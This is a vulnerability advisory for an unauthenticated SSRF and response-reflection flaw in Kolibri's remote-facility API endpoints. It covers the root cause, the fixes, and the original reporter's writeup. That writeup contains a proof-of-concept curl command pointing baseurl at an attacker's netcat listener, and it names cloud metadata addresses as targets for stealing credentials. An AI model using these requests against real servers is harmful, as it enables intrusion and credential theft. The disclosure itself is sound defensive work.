PT-2026-48808 · Pypi · Kolibri
Published
2026-06-11
·
Updated
2026-06-11
·
CVE-2026-48053
CVSS v3.1
5.8
Medium
| Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
Summary
Several Kolibri API endpoints accept an unvalidated
baseurl parameter and fetch attacker-controlled URLs from the Kolibri server, reflecting the response body back to the caller. The original report identified two endpoints on the RemoteFacilityUser* viewsets; remediation review found two further reflection points on the same pattern. The GET endpoint was unauthenticated.Affected endpoints
Reported:
GET /api/auth/remotefacilityuser→RemoteFacilityUserViewset(kolibri/core/auth/api.py:1570). No authentication required.POST /api/auth/remotefacilityauthenticateduserinfo→RemoteFacilityUserAuthenticatedViewset(kolibri/core/auth/api.py:1594). Authentication is checked against the remote server rather than the local Kolibri.
Found during remediation:
POST /api/public/setupwizard/loddata→ setup wizard's remote-signup proxy (kolibri/plugins/setup wizard/api.py). Reachable on unprovisioned devices.GET /api/public/networklocation/<id>/facilities/→NetworkLocationFacilitiesView(kolibri/core/discovery/api.py). Authenticated but with the sameResponse(remote payload)pattern.
Root cause
Two compounding issues:
- Response reflection — these endpoints returned the remote server's JSON body more or less verbatim to the caller (
Response(response.json()),Response(facility info["users"]), etc.). - No restriction on the remote target —
baseurlwas validated only byURLValidator(schemes=["http", "https"]).NetworkClient.build for address()would connect to any host with a valid Kolibri-shaped/api/public/info/response, andrequestsfollowed 30x redirects by default, so a hostile peer could pivot the fetch to an arbitrary host (cloud metadata, internal services) before reflection.
Two reflection vectors
GET vector (
RemoteFacilityUserViewset):
The viewset fetched <baseurl>/api/public/facilitysearchuser/ and returned Response(response.json()). An attacker-controlled baseurl returned a 302 to an arbitrary internal URL; requests followed the redirect, and the redirected response body was returned to the attacker.POST vector (
RemoteFacilityUserAuthenticatedViewset):
get remote users info() fetched <baseurl>/api/public/facilityuser/ with Basic Auth and the viewset returned Response(facility info["users"]). A malicious baseurl returned crafted user-shaped JSON; arbitrary smuggled fields were reflected back to the caller. The setup wizard and NetworkLocationFacilitiesView endpoints had the same shape on different remote URLs.Reproduction
The vulnerability can be reproduced by pointing
baseurl at an attacker-controlled HTTP server that:- Responds to
GET /api/public/info/with a valid Kolibri info payload (soNetworkClient.build for address()succeeds). - GET vector: responds to
GET /api/public/facilitysearchuser/with a 302 redirect to the target URL. The redirected response body is reflected viaResponse(response.json()). - POST vector: responds to the relevant remote URL with crafted JSON containing additional fields. The full JSON is reflected.
A working PoC has been retained internally and is not published with this advisory.
Demonstrated impact (pre-fix)
- Unauthenticated outbound requests from the Kolibri server to any HTTP(S) URL the attacker chose (GET endpoint only; the others required auth or an unprovisioned device).
- Reflected data exfiltration for any HTTP endpoint that responded to a plain
GETwith JSON and no special request headers. - Cloud metadata reachability was realistic but service-specific:
- AWS IMDSv1 — reachable
- DigitalOcean (
/metadata/v1.json) — reachable - GCP, Azure, AWS IMDSv2 — not reachable via this vector (require
Metadata-Flavor/Metadata/ token headers that the attacker could not inject) - Reachability of internal HTTP services on the same network as the Kolibri server, with their JSON responses returned to the attacker.
Not demonstrated
The earlier draft asserted port scanning via a timing oracle and generic "internal network mapping." The reflection vector reads response bodies directly when the target speaks JSON; timing-based scanning of arbitrary TCP services was not demonstrated and is not the headline risk.
Mitigation
Four layers of defence:
- Response sanitisation. Each affected endpoint now coerces the remote response to a documented shape before returning it. Smuggled fields are dropped.
- Authentication. The previously-open
RemoteFacilityUser*endpoints now require an authenticated caller (or an unprovisioned device, for setup-wizard flows). - Cross-host redirect blocking. Remote-fetch HTTP sessions refuse 30x responses that point to a different hostname. Same-host redirects still work.
- Peer allowlist. Endpoints that accept a caller-supplied
baseurlresolve it only to peers Kolibri already knows about, rather than connecting to arbitrary hosts. Discovery and CLI flows that legitimately need to probe new addresses use a separate code path.
Credit
Initial report and identification of the
RemoteFacilityUser* viewsets by @beraoudabdelkhalek. Reflection-based PoC, additional vector identification, and remediation by the Kolibri maintainers.Original report by @beraoudabdelkhalek
Summary
The
RemoteFacilityUserViewset API endpoint (/api/auth/remotefacilityuser) has no authentication or permission checks and accepts a user-controlled baseurl parameter. This parameter is passed directly to NetworkClient.build for address() which makes server-side HTTP requests to the attacker-specified URL. An unauthenticated attacker can force the Kolibri server to reach out to arbitrary internal hosts, port-scan internal networks, and access cloud metadata endpoints.Details
This is mainly due to the following issues:
1. Missing authentication on the API endpoint
File:
kolibri/core/auth/api.py, line ~1553class RemoteFacilityUserViewset(views.APIView): # No permission classes → AllowAny
def get(self, request):
baseurl = request.query params.get("baseurl", "")
validator(baseurl) # Only checks URL format (http/https scheme + valid hostname)
client = NetworkClient.build for address(baseurl)
response = client.get(url, params={"facility": facility, "search": username})
No
permission classes attribute is defined, and DEFAULT PERMISSION CLASSES is not set in the DRF configuration, so the endpoint defaults to AllowAny , accepting requests with zero authentication.Similarly,
RemoteFacilityUserAuthenticatedViewset (line ~1577, POST endpoint) also has no permission classes, though it currently checks permissions via a different mechanism. The initial build for address() call still fires before that check.2. Weak URL validation
File:
kolibri/utils/urls.py, line 1-7from django.core.validators import URLValidator
validator = URLValidator(schemes=["http", "https"])
The only validation is that the URL has an http or https scheme and a valid hostname. There is no block on:
- RFC 1918 private IPs (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
- Loopback addresses (127.0.0.0/8, ::1)
- Link-local addresses (169.254.0.0/16, including AWS/GCP/Azure metadata endpoints)
- IPv6 equivalents of any of the above
PoC
Prerequisites: A listener on a host reachable by the Kolibri server (e.g.,
nc -lvp 1337) the listener can be local or remote.Against a local Docker deployment (validated against Kolibri 0.19.3):
# Trigger the SSRF no auth headers needed
curl "http://localhost:8080/api/auth/remotefacilityuser?baseurl=http://172.17.0.1:1337&username=test&facility=<facility id>"
The Kolibri server makes an outbound HTTP request to the attacker's listener:
GET /api/public/info/?v=3 HTTP/1.1
Host: 172.17.0.1:1337
User-Agent: Kolibri/0.19.3 python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Testers have also confirmed the issue against live deployments of Kolibri.
Impact
Unauthenticated SSRF : any attacker who can reach the Kolibri server can make it issue HTTP requests to arbitrary hosts, with no credentials needed
Internal network scanning : the built-in port scanning behavior (5+ ports per HTTP target, 24+ connection attempts per request) allows mapping internal networks through the timing oracle
Cloud metadata access : if Kolibri runs on a cloud VM (AWS EC2, GCP, Azure), the attacker can reach 169.254.169.254 and potentially exfiltrate IAM credentials and instance metadata
Internal service discovery : other Kolibri instances or internal services on the network can be discovered and their API responses read by the attacker
Blind SSRF via POST endpoint : RemoteFacilityUserAuthenticatedViewset returns 403 to the attacker but still makes the outbound request before the permission check
Fix
SSRF
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Kolibri